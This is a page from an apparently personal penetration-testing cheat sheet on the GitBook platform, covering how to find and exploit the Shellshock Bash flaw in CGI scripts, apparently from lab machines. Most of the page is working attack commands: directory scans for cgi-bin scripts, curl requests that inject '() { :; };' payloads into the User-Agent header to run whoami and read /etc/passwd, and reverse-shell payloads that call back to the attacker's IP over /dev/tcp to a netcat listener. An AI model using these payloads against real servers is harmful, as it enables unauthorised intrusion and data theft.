Pentest
  • Homepage
  • Pentest Links
  • 01 Prep
    • Target Inventory
    • OSINT and Dorks
    • Recon-ng dns zone snoop
    • ❤️Gitbook
  • 02 Scan
    • *Favorites
    • Burp
    • Dirb nikto wpscan etc
    • Enum Finger and Brute SSH
    • Fuzzing
    • Nmap
    • Open Port Checks OneLiner
    • Port Knocking
    • SSL Issues
    • Tcpdump
  • 03 Getting In
    • Char Evasion Tricks
    • Email SMTP
    • Eternal Blue
    • FTP
    • heartbleed
    • Metasploit
    • MySql
    • NFS
    • Oracle
    • Postgres
    • PowerShell Empire
    • Shells
    • rpc
    • SMB Samba
    • SSH Tips
    • SQLite3
    • Veil
  • 04 WebApps
    • Apache
    • Blogs
    • Coldfusion
    • Content Management (CMS)
    • Drupal
    • Elastix FreePBX
    • HttpFileServer (HFS)
    • IIS
    • IIS6 WebDav
    • Local File Inclusion (LFI)
    • Magento
    • Nagios
    • PFSense
    • php
    • php type juggling
    • phpLite
    • Web Injections
    • Javascript
    • Shellshock
    • SQL Injections (sqli)
    • SQLMap
    • WAF
    • Webmin
    • Web Scrape
    • Wordpress
  • 05 Passwords & Ciphers
    • Cipher Decrypt
    • Cipher RSA Wiener P-Q-E
    • Cracking
    • Dict Guess List Mangle
    • Get Hashes
    • Hydra Brutes
    • Images Exif Steg
    • Malware Analysis
    • Pull Hashes PCredz
    • SSH PrivKey Passphrase
    • Unzip Crack
    • Windows PW
  • 06 Linux PrivEsc
    • 1 Look Around
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • binaries
    • Buffer Overflow
    • bash prison
    • Monitor Files
    • mongodb node
    • Pivots
    • Remote Execute
    • Shell TTY Fix
    • TAR backups
    • Transfer Files
    • vnc
  • 07 Windows PrivEsc
    • 1 Windows cmd kungfu
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • Bloodhound
    • DLL Hijack MSF
    • Kerberos
    • Memory Analysis
    • NTDS
    • Powershell
    • Responder
    • Saved Creds runas
Powered by GitBook
On this page
  • Finding Shellshock
  • Exploiting Shellshock
  • Blind Shellshock

Was this helpful?

  1. 04 WebApps

Shellshock

Finding Shellshock

  • /cgi-sys

  • /cgi-mod

  • /cgi-bin

> dirb http://10.129.88.173
    .. http://10.129.88.173/cgi-bin/        ..found/forbidden
    .. http://10.129.88.173/server-status/  ..found/forbidden

> dirb http://10.129.88.173/cgi-bin/ -X .sh
> dirb http://10.129.88.173/cgi-bin/ -X .sh,.php,.cgi,.pl,.py 
    .. http://10.129.88.173/cgi-bin/user.sh   ..found!

nmap 
didnt help at all:
> nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=ls 10.129.88.173

try this next time
nmap -p 80 --script http-shellshock --script-args uri=/cgi-bin/vulnscript.sh 10.x.x.x


gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.56
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.56 -f 
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.56/cgi-bin/ -x sh,cgi,pl,py,php

-f: flag appends / to end of directory 
-x: file extensions to search for

Exploiting Shellshock

nc -nvlp 4444

User-Agent: () { :; }; /bin/bash -c 'ping -c 3 $MyIP:4444'


curl -H 'User-Agent: () { :; }; /bin/bash -c 'ping -c 3 $MyIP:4444'' http://$IP:10000/session_login.cgi
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'whoami'" http://$IP/cgi-bin/user.sh
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://$IP/cgi-bin/user.sh
curl -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/$MyIP/4444 0>&1" http://$IP/cgi-bin/user.sh
nc -nvlp 4444  ..Connected!

Blind Shellshock

  • CGI might be vulnerable, even if your scan didnt find report it

  • 'searchsploit webmin' .. Results with 'cgi' - might be vulnerable

  • Find the cgi page, like 'session_login.cgi'

  • Might be hiding on 'view source'

  • Send it through burp/repeater for the injection

User-Agent:
() { :; };/bin/echo hello   ..no results, may still be a blind injection
() { :; }; sleep 10         ..if it sleeps, it is vuln
() { :; }; bash -i >& /dev/tcp/10.10.14.73/4444 0>&1

nc -nvlp 4444  ..Connected!
PreviousJavascriptNextSQL Injections (sqli)

Last updated 2 years ago

Was this helpful?

REF:

beephtb